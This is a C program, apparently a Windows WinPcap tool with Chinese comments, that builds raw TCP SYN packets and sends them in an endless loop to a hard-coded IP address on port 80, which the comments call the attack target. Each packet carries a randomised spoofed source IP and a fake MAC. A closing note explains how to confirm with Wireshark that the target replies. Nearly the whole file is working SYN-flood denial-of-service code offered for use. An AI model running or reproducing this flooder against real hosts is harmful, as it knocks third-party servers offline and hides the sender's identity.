#define HAVE_REMOTE
#include<stdio.h>
#include<pcap.h>
#include<winsock2.h>
#include <time.h>
#include "remote-ext.h"
#pragma comment(lib,"wpcap.lib")
#pragma comment(lib,"WS2_32.lib")
#pragma pack(push,1)
typedef struct _TCP_SYN
{
unsigned char DstMAC[6]; // 目的mac地址
unsigned char SrcMAC[6]; // 源mac地址
unsigned char OtherData[12];
unsigned short Header_ChechSum; // 校验和
unsigned int SrcIP; // Source IP address
unsigned int DstIP; // Destination IP address
unsigned short SrcPort; // Source IP Port
unsigned short DstPort; // Destination IP Port,一般为80端口,值为0x5000
unsigned char Ohters[16];
unsigned short pak_checksum;
unsigned char OtherLast[1];
}TCP_SYN, *PTCP_SYN;
#pragma pack(pop)
unsigned char bufData[]="\x00\x25\x86\x27\xd1\x22\x90\x2b\x34\x60\xbd\x44\x08\x00\x45\x00"
"\x00\x34\x61\xdc\x40\x00\x80\x06\x71\x83\xc0\xa8\x01\x6a\x7a\xe4"
"\xea\x6d\x0b\x0c\x00\x50\xb9\xc2\xf5\x06\x00\x00\x00\x00\x80\x02"
"\xff\xff\x8d\x8d\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x01\x01\x01"
"\x04\x02";
// clac the header's check sum
unsigned short checksum(unsigned short *buffer, int size)
{
unsigned long cksum=0;
while(size > 1)
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
{
cksum += *(unsigned char*)buffer;
}
cksum = (cksum>>16) + (cksum & 0xffff);
cksum += (cksum>>16);
return (unsigned short)(~cksum);
}
int main(int argc, char* argv[])
{
pcap_if_t *alldevs;
pcap_if_t *seldev;
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE];
srand(time(0));
/* 获取本机设备列表 */
if (pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
// 找到一个有ip的就当有连网的网卡了
for (seldev = alldevs; seldev != NULL; seldev = seldev->next)
{
pcap_addr* pcapaddr = NULL;
for (pcapaddr= seldev->addresses; pcapaddr != NULL; pcapaddr = pcapaddr->next)
{
if (pcapaddr->addr->sa_data[2] != '\0' && pcapaddr->addr->sa_data[3] != '\0')
{
break;
}
}
if (pcapaddr != NULL)
{
break;
}
}
if (seldev == NULL)
{
fprintf(stderr, "Can not find network!\n");
exit(1);
}
/* 打开这个输出设备 */
if ( (fp= pcap_open(seldev->name, // 设备名
100, // 要捕获的部分 (只捕获前100个字节)
PCAP_OPENFLAG_PROMISCUOUS, // 混杂模式
1000, // 读超时时间
NULL, // 远程机器验证
errbuf // 错误缓冲
) ) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", alldevs->name);
return -1;
}
// 修改源MAC、IP地址 , 并修改首部校验和
PTCP_SYN SynData = (PTCP_SYN)bufData;
while(1)
{
memcpy(SynData->SrcMAC, "\x01\x01\x01\x01\x01\x01", 6); // 源MAC地址 01:01:01:01:01:01
SynData->DstIP = inet_addr("123.125.114.144"); // 攻击的目标
SynData->DstPort = htons(80); // 目标端口80
SynData->SrcIP = (unsigned int)rand(); // 源IP地址随机产生
SynData->SrcPort = (unsigned short)rand()%100+1024; // 源端口随机产生
SynData->Header_ChechSum = 0;
SynData->Header_ChechSum = checksum((unsigned short*)&bufData[14], 20); // 计算checksum
// printf("%d\n", SynData->Header_ChechSum);
/* 发送数据包 */
// (wireshark 黑底红字为 校验和错误 的包).
if (pcap_sendpacket(fp, bufData, sizeof(bufData)-1 ) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
return -1;
}
}
/* 释放设备列表 */
pcap_freealldevs(alldevs);
return 0;
}
可以把源IP改成自己的,然后用wireshark软件截包,再发送一个包出去,会发现对方回应了这个包(具体为可以收到[SYN,ACK]包),如果一直在while循环发送数据,那么wireshark就忙于显示发送出去的包,对于接收包很难看到,所以把while(1)注释掉,一个包一个包发验证情况